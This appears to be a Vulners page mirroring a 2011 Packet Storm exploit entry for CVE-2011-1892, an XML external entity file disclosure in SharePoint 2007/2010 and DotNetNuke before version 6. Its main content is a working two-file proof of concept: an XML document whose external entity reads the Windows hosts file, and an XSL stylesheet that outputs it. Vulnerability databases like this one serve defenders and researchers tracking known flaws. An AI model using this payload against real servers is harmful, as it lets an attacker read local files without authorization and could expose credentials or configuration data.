Lucene search
K

SharePoint 2007 / 2010 And DotNetNuke File Disclosure

🗓️ 21 Sep 2011 00:00:00Reported by Nicolas GregoireType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 53 Views

File disclosure via XEE in SharePoint and DotNetNuke, CVE-2011-189

Related
Code
`Exploit Title: File disclosure via XEE in SharePoint and DotNetNuke  
Date: September 15, 2011  
Author: Nicolas Gregoire  
Version: SharePoint 2007 / 2010, DotNetNuke < 6  
CVE : CVE-2011-1892  
  
poc filename: xee.xml  
  
<!DOCTYPE doc [  
<!ENTITY boom SYSTEM "c:\\windows\\system32\\drivers\\etc\\hosts">  
]>  
<doc>&boom;</doc>  
  
poc filename: xee.xsl  
  
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">  
<xsl:template match="/">  
<xsl:apply-templates/>  
<xsl:value-of select="doc"/>  
</xsl:template>  
</xsl:stylesheet>  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

21 Sep 2011 00:00Current
6.4Medium risk
Vulners AI Score6.4
EPSS0.65122
53